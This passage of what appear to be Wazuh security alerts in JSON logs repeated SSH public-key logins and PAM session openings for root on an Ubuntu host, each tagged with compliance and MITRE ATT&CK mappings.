success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 